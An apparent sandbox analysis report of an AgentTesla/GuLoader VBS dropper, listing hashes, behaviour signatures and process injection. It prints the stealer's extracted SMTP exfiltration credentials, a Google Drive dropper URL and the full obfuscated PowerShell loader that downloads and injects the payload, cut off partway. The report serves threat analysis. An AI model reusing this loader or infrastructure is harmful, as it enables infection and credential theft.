agenttesla | 1ef04afb88292cc59711d31f29175aa4ee66f0fb5431c417ad4f02cf3588d935

General

Target

PagoFactu.vbs
Size

124KB
MD5

a911fcb381e94db6603ee3bbed255241
SHA1

e388706d286fca439dae5d0e59c446260e29e47e
SHA256

1ef04afb88292cc59711d31f29175aa4ee66f0fb5431c417ad4f02cf3588d935
SHA512

d7112dd62e70c0cabe505aa834d37be53e46e152ca6c06ec9d4314412262fe528d16e6e0d285b29e4acc1ae10d58798567f4bb88a6c747ca65541e575e43eab8
SSDEEP

3072:FXFq3Cj8LqP/D9+y7jP0WCuH4q07guhoK:lFw/mPL9+yXFHv07N

Score

10^/10

agenttesla guloader collection downloader keylogger spyware stealer trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=1nSKAGzrSWPtToUe3WbRHdqpyZLyve4Tg

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.heladospalacio.com
Port:
587
Username:
[email protected]
Password:
Drs4x0!6
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Blocklisted process makes network request 3 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

2 872 WScript.exe
6 1752 powershell.exe
8 1752 powershell.exe

flow	pid	process
2	872	WScript.exe
6	1752	powershell.exe
8	1752	powershell.exe

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.execaspol.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	caspol.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

caspol.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	caspol.exe
Key opened	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	caspol.exe
Key opened	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	caspol.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

16 api.ipify.org
17 api.ipify.org
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

caspol.exe

pid process

1944 caspol.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.execaspol.exe

pid process

1752 powershell.exe
1944 caspol.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1752 set thread context of 1944 1752 powershell.exe caspol.exe

flow	ioc
16	api.ipify.org
17	api.ipify.org

pid	process
1944	caspol.exe

pid	process
1752	powershell.exe
1944	caspol.exe

description	pid	process	target process
PID 1752 set thread context of 1944	1752	powershell.exe	caspol.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

WScript.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	WScript.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

1168 powershell.exe
1752 powershell.exe
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

powershell.exe

pid process

1752 powershell.exe
1752 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.execaspol.exe

description pid process

Token: SeDebugPrivilege 1168 powershell.exe
Token: SeDebugPrivilege 1752 powershell.exe
Token: SeDebugPrivilege 1944 caspol.exe

pid	process
1168	powershell.exe
1752	powershell.exe

pid	process
1752	powershell.exe
1752	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1168	powershell.exe
Token: SeDebugPrivilege	1752	powershell.exe
Token: SeDebugPrivilege	1944	caspol.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 872 wrote to memory of 1328	872	WScript.exe	cmd.exe
PID 872 wrote to memory of 1328	872	WScript.exe	cmd.exe
PID 872 wrote to memory of 1328	872	WScript.exe	cmd.exe
PID 872 wrote to memory of 1252	872	WScript.exe	cmd.exe
PID 872 wrote to memory of 1252	872	WScript.exe	cmd.exe
PID 872 wrote to memory of 1252	872	WScript.exe	cmd.exe
PID 872 wrote to memory of 1168	872	WScript.exe	powershell.exe
PID 872 wrote to memory of 1168	872	WScript.exe	powershell.exe
PID 872 wrote to memory of 1168	872	WScript.exe	powershell.exe
PID 1168 wrote to memory of 1752	1168	powershell.exe	powershell.exe
PID 1168 wrote to memory of 1752	1168	powershell.exe	powershell.exe
PID 1168 wrote to memory of 1752	1168	powershell.exe	powershell.exe
PID 1168 wrote to memory of 1752	1168	powershell.exe	powershell.exe
PID 1752 wrote to memory of 1696	1752	powershell.exe	caspol.exe
PID 1752 wrote to memory of 1696	1752	powershell.exe	caspol.exe
PID 1752 wrote to memory of 1696	1752	powershell.exe	caspol.exe
PID 1752 wrote to memory of 1696	1752	powershell.exe	caspol.exe
PID 1752 wrote to memory of 1944	1752	powershell.exe	caspol.exe
PID 1752 wrote to memory of 1944	1752	powershell.exe	caspol.exe
PID 1752 wrote to memory of 1944	1752	powershell.exe	caspol.exe
PID 1752 wrote to memory of 1944	1752	powershell.exe	caspol.exe
PID 1752 wrote to memory of 1944	1752	powershell.exe	caspol.exe

outlook_office_path 1 IoCs

Processes:

caspol.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	caspol.exe

outlook_win_path 1 IoCs

Processes:

caspol.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	caspol.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PagoFactu.vbs"
1⤵
- Blocklisted process makes network request
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:872
- C:\Windows\System32\cmd.exe
  cmd /c echo off
  2⤵
  PID:1328
- C:\Windows\System32\cmd.exe
  cmd /c echo rshell
  2⤵
  PID:1252
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Cockerin = """Function Gerase11 { param([String]`$Bifangedb); `$Parke = ''; Write-Host `$Parke; Write-Host `$Parke; Write-Host `$Parke; `$Cephalor = New-Object byte[] (`$Bifangedb.Length / 2); For(`$Bredbaand=0; `$Bredbaand -lt `$Bifangedb.Length; `$Bredbaand+=2){ `$Cephalor[`$Bredbaand/2] = [convert]::ToByte(`$Bifangedb.Substring(`$Bredbaand, 2), 16); `$Phars = (`$Cephalor[`$Bredbaand/2] -bxor 75); `$Cephalor[`$Bredbaand/2] = `$Phars; } [String][System.Text.Encoding]::ASCII.GetString(`$Cephalor);}`$Syphi0=Gerase11 '1832383F2E26652F2727';`$Syphi1=Gerase11 '062228392438242D3F651C22257879651E25382A2D2E052A3F223D2E062E3F23242F38';`$Syphi2=Gerase11 '0C2E3F1B3924280A2F2F392E3838';`$Syphi3=Gerase11 '1832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865032A252F272E192E2D';`$Syphi4=Gerase11 '383F3922252C';`$Syphi5=Gerase11 '0C2E3F06242F3E272E032A252F272E';`$Syphi6=Gerase11 '191F183B2E28222A27052A262E676B03222F2E093218222C676B1B3E29272228';`$Syphi7=Gerase11 '193E253F22262E676B062A252A2C2E2F';`$Syphi8=Gerase11 '192E2D272E283F2E2F0F2E272E2C2A3F2E';`$Syphi9=Gerase11 '0225062E2624393206242F3E272E';`$Bilv0=Gerase11 '06320F2E272E2C2A3F2E1F323B2E';`$Bilv1=Gerase11 '08272A3838676B1B3E29272228676B182E2A272E2F676B0A25382208272A3838676B0A3E3F2408272A3838';`$Bilv2=Gerase11 '02253D24202E';`$Bilv3=Gerase11 '1B3E29272228676B03222F2E093218222C676B052E3C1827243F676B1D22393F3E2A27';`$Bilv4=Gerase11 '1D22393F3E2A270A27272428';`$Bilv5=Gerase11 '253F2F2727';`$Bilv6=Gerase11 '053F1B39243F2E283F1D22393F3E2A27062E26243932';`$Bilv7=Gerase11 '020E13';`$Bilv8=Gerase11 '17';`$Retreati=Gerase11 '1E180E197879';`$Pesachbr=Gerase11 '082A27271C22252F243C1B3924280A';function fkp {Param (`$creepm, `$Trylle) ;`$Grnlandsk1500 =Gerase11 '6F182E2A2F396B766B63100A3B3B0F24262A2225167171083E39392E253F0F24262A2225650C2E3F0A38382E262927222E3863626B376B1C232E392E660429212E283F6B306B6F14650C2724292A270A38382E26292732082A28232E6B660A252F6B6F14650724282A3F22242565183B27223F636F0922273D736210667A16650E3A3E2A2738636F18323B23227B626B3662650C2E3F1F323B2E636F18323B23227A62';.(`$Bilv7) `$Grnlandsk1500;`$Grnlandsk1505 = Gerase11 '6F082A2922252E79797D6B766B6F182E2A2F39650C2E3F062E3F23242F636F18323B232279676B101F323B2E1016166B0B636F18323B232278676B6F18323B23227F6262';.(`$Bilv7) `$Grnlandsk1505;`$Grnlandsk1501 = Gerase11 '392E3F3E39256B6F082A2922252E79797D6502253D24202E636F253E2727676B0B63101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865032A252F272E192E2D1663052E3C660429212E283F6B1832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865032A252F272E192E2D6363052E3C660429212E283F6B02253F1B3F3962676B636F182E2A2F39650C2E3F062E3F23242F636F18323B23227E62626502253D24202E636F253E2727676B0B636F28392E2E3B2662626262676B6F1F393227272E6262';.(`$Bilv7) `$Grnlandsk1501;}function GDT {Param ([Parameter(Position = 0, Mandatory = `$True)] [Type[]] `$Supernati,[Parameter(Position = 1)] [Type] `$Swirespiri = [Void]);`$Grnlandsk1502 = Gerase11 '6F093E27272E6B766B100A3B3B0F24262A2225167171083E39392E253F0F24262A2225650F2E2D22252E0F32252A2622280A38382E262927326363052E3C660429212E283F6B1832383F2E2665192E2D272E283F222425650A38382E26292732052A262E636F18323B2322736262676B101832383F2E2665192E2D272E283F222425650E26223F650A38382E26292732093E22272F2E390A28282E3838167171193E2562650F2E2D22252E0F32252A26222806242F3E272E636F18323B232272676B6F2D2A27382E62650F2E2D22252E1F323B2E636F0922273D7B676B6F0922273D7A676B101832383F2E2665063E273F22282A383F0F2E272E2C2A3F2E1662';.(`$Bilv7) `$Grnlandsk1502;`$Grnlandsk1503 = Gerase11 '6F093E27272E650F2E2D22252E082425383F393E283F2439636F18323B23227D676B101832383F2E2665192E2D272E283F22242565082A272722252C0824253D2E253F22242538167171183F2A252F2A392F676B6F183E3B2E39252A3F226265182E3F02263B272E262E253F2A3F2224250D272A2C38636F18323B23227C62';.(`$Bilv7) `$Grnlandsk1503;`$Grnlandsk1504 = Gerase11 '6F093E27272E650F2E2D22252E062E3F23242F636F0922273D79676B6F0922273D78676B6F183C22392E383B223922676B6F183E3B2E39252A3F226265182E3F02263B272E262E253F2A3F2224250D272A2C38636F18323B23227C62';.(`$Bilv7) `$Grnlandsk1504;`$Grnlandsk1505 = Gerase11 '392E3F3E39256B6F093E27272E6508392E2A3F2E1F323B2E6362';.(`$Bilv7) `$Grnlandsk1505 ;}`$Autoh = Gerase11 '202E39252E277879';`$Gerase03 = Gerase11 '0C2E3F0824253824272E1C22252F243C';`$Gerase00=Gerase11 '1823243C1C22252F243C';`$Gerase01 = Gerase11 '6F18272E253F392E3F7C786B766B101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865062A3938232A271671710C2E3F0F2E272E2C2A3F2E0D24390D3E25283F2224251B2422253F2E3963632D203B6B6F192E3F392E2A3F226B6F0C2E392A382E7B7B62676B630C0F1F6B0B631002253F1B3F3916676B101E02253F787916626B631002253F1B3F3916626262';.(`$Bilv7) `$Gerase01;`$Gerase02 = Gerase11 '6F08232A266B766B101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865062A3938232A271671710C2E3F0F2E272E2C2A3F2E0D24390D3E25283F2224251B2422253F2E3963632D203B6B6F0A3E3F24236B6F0C2E392A382E7B7862676B630C0F1F6B0B631002253F1B3F3916626B631002253F1B3F3916626262';.(`$Bilv7) `$Gerase02;`$Grnlandsk1507 = Gerase11 '6F183F222D2D2E6B766B6F08232A266502253D24202E637B62';.(`$Bilv7) `$Grnlandsk1507;`$Grnlandsk1507 = Gerase11 '6F18272E253F392E3F7C786502253D24202E636F183F222D2D2E676B7B62';.(`$Bilv7) `$Grnlandsk1507;`$Grnlandsk1506 = Gerase11 '6F0824262A252F2A253F2E6B766B101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865062A3938232A271671710C2E3F0F2E272E2C2A3F2E0D24390D3E25283F2224251B2422253F2E3963632D203B6B6F0A3E3F24236B6F0922273D7F62676B630C0F1F6B0B631002253F1B3F3916676B101E02253F787916676B101E02253F787916676B101E02253F787916626B631002253F1B3F3916626262';.(`$Bilv7) `$Grnlandsk1506;`$Orato = fkp `$Bilv5 `$Bilv6;`$Grnlandsk1507 = Gerase11 '6F082426263E2522312A786B766B6F0824262A252F2A253F2E6502253D24202E631002253F1B3F39167171112E3924676B7D7E7D676B7B33787B7B7B676B7B337F7B62';.(`$Bilv7) `$Grnlandsk1507;`$Grnlandsk1508 = Gerase11 '6F0225283E39386B766B6F0824262A252F2A253F2E6502253D24202E631002253F1B3F39167171112E3924676B7A7F7E737A7C7D7B676B7B33787B7B7B676B7B337F62';.(`$Bilv7) `$Grnlandsk1508;`$Gerase01 = 'https://drive.google.com/uc?export=download&id=1nSKAGzrSWPtToUe3WbRHdqpyZLyve4Tg';`$Gerase00 = Gerase11 '6F03243D2E2F2A203F396B766B63052E3C660429212E283F6B052E3F651C2E290827222E253F62650F243C2527242A2F183F3922252C636F0C2E392A382E7B7A62';`$Grnlandsk1508 = Gerase11 '6F082426263E2522312A79766F2E253D712A3B3B2F2A3F2A';.(`$Bilv7) `$Grnlandsk1508;`$Communiza2=`$Communiza2+'\Fogeych.dat';`$Hovedaktr='';if (-not(Test-Path `$Communiza2)) {while (`$Hovedaktr -eq '') {.(`$Bilv7) `$Gerase00;Start-Sleep 5;}Set-Content `$Communiza2 `$Hovedaktr;}`$Hovedaktr = Get-Content `$Communiza2;`$Grnlandsk1509 = Gerase11 '6F0C3925272A252F38207A7E7B6B766B101832383F2E26650824253D2E393F1671710D392426092A382E7D7F183F3922252C636F03243D2E2F2A203F3962';.(`$Bilv7) `$Grnlandsk1509;`$Hovedaktr0 = Gerase11 '101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865062A3938232A2716717108243B32636F0C3925272A252F38207A7E7B676B7B676B6B6F082426263E2522312A78676B7D7E7D62';.(`$Bilv7) `$Hovedaktr0;`$Gautes=`$Grnlandsk150.count-656;`$Hovedaktr1 = Gerase11 '101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865062A3938232A2716717108243B32636F0C3925272A252F38207A7E7B676B7D7E7D676B6F0225283E3938676B6F0C2A3E3F2E3862';.(`$Bilv7) `$Hovedaktr1;`$Hovedaktr2 = Gerase11 '6F092E38392C6B766B101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865062A3938232A271671710C2E3F0F2E272E2C2A3F2E0D24390D3E25283F2224251B2422253F2E3963632D203B6B6F192E3F392E2A3F226B6F1B2E382A2823293962676B630C0F1F6B0B631002253F1B3F3916676B1002253F1B3F3916676B1002253F1B3F3916676B1002253F1B3F3916676B1002253F1B3F3916626B631002253F1B3F3916626262';.(`$Bilv7) `$Hovedaktr2;`$Hovedaktr3 = Gerase11 '6F092E38392C6502253D24202E636F082426263E2522312A78676F0225283E3938676F04392A3F24677B677B62';.(`$Bilv7) `$Hovedaktr3#;""";Function Hovedaktr9 { param([String]$Bifangedb); For($Bredbaand=0; $Bredbaand -lt $Bifangedb.Length-1; $Bredbaand+=(0+1)){$Gerase = $Gerase + $Bifangedb.Substring($Bredbaand, 1)}; $Gerase;}$Spritt0 = Hovedaktr9 'IEX ';$Spritt1= Hovedaktr9 $Cockerin;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Spritt1 ;}else{.$Spritt0 $Spritt1;}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1168
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Gerase11 { param([String]$Bifangedb); $Parke = ''; Write-Host $Parke; Write-Host $Parke; Write-Host $Parke; $Cephalor = New-Object byte[] ($Bifangedb.Length / 2); For($Bredbaand=0; $Bredbaand -lt $Bifangedb.Length; $Bredbaand+=2){ $Cephalor[$Bredbaand/2] = [convert]::ToByte($Bifangedb.Substring($Bredbaand, 2), 16); $Phars = ($Cephalor[$Bredbaand/2] -bxor 75); $Cephalor[$Bredbaand/2] = $Phars; } [String][System.Text.Encoding]::ASCII.GetString($Cephalor);}$Syphi0=Gerase11 '1832383F2E26652F2727';$Syphi1=Gerase11 '062228392438242D3F651C22257879651E25382A2D2E052A3F223D2E062E3F23242F38';$Syphi2=Gerase11 '0C2E3F1B3924280A2F2F392E3838';$Syphi3=Gerase11 '1832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865032A252F272E192E2D';$Syphi4=Gerase11 '383F3922252C';$Syphi5=Gerase11 '0C2E3F06242F3E272E032A252F272E';$Syphi6=Gerase11 '191F183B2E28222A27052A262E676B03222F2E093218222C676B1B3E29272228';$Syphi7=Gerase11 '193E253F22262E676B062A252A2C2E2F';$Syphi8=Gerase11 '192E2D272E283F2E2F0F2E272E2C2A3F2E';$Syphi9=Gerase11 '0225062E2624393206242F3E272E';$Bilv0=Gerase11 '06320F2E272E2C2A3F2E1F323B2E';$Bilv1=Gerase11 '08272A3838676B1B3E29272228676B182E2A272E2F676B0A25382208272A3838676B0A3E3F2408272A3838';$Bilv2=Gerase11 '02253D24202E';$Bilv3=Gerase11 '1B3E29272228676B03222F2E093218222C676B052E3C1827243F676B1D22393F3E2A27';$Bilv4=Gerase11 '1D22393F3E2A270A27272428';$Bilv5=Gerase11 '253F2F2727';$Bilv6=Gerase11 '053F1B39243F2E283F1D22393F3E2A27062E26243932';$Bilv7=Gerase11 '020E13';$Bilv8=Gerase11 '17';$Retreati=Gerase11 '1E180E197879';$Pesachbr=Gerase11 '082A27271C22252F243C1B3924280A';function fkp {Param ($creepm, $Trylle) ;$Grnlandsk1500 =Gerase11 '6F182E2A2F396B766B63100A3B3B0F24262A2225167171083E39392E253F0F24262A2225650C2E3F0A38382E262927222E3863626B376B1C232E392E660429212E283F6B306B6F14650C2724292A270A38382E26292732082A28232E6B660A252F6B6F14650724282A3F22242565183B27223F636F0922273D736210667A16650E3A3E2A2738636F18323B23227B626B3662650C2E3F1F323B2E636F18323B23227A62';.($Bilv7) $Grnlandsk1500;$Grnlandsk1505 = Gerase11 '6F082A2922252E79797D6B766B6F182E2A2F39650C2E3F062E3F23242F636F18323B232279676B101F323B2E1016166B0B636F18323B232278676B6F18323B23227F6262';.($Bilv7) $Grnlandsk1505;$Grnlandsk1501 = Gerase11 '392E3F3E39256B6F082A2922252E79797D6502253D24202E636F253E2727676B0B63101832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865032A252F272E192E2D1663052E3C660429212E283F6B1832383F2E2665193E253F22262E6502253F2E39243B182E393D22282E3865032A252F272E192E2D6363052E3C660429212E283F6B02253F1B3F3962676B636F182E2A2F39650C2E3F062E3F23242F636F18323B23227E62626502253D24202E636F253E2727676B0B636F28392E2E3B2662626262676B6F1F393227272E6262';.($Bilv7) $Grnlandsk1501;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Supernati,[Parameter(Position = 1)] [Type] $Swirespiri = [Void]);$Grnlandsk1502 = Gerase11 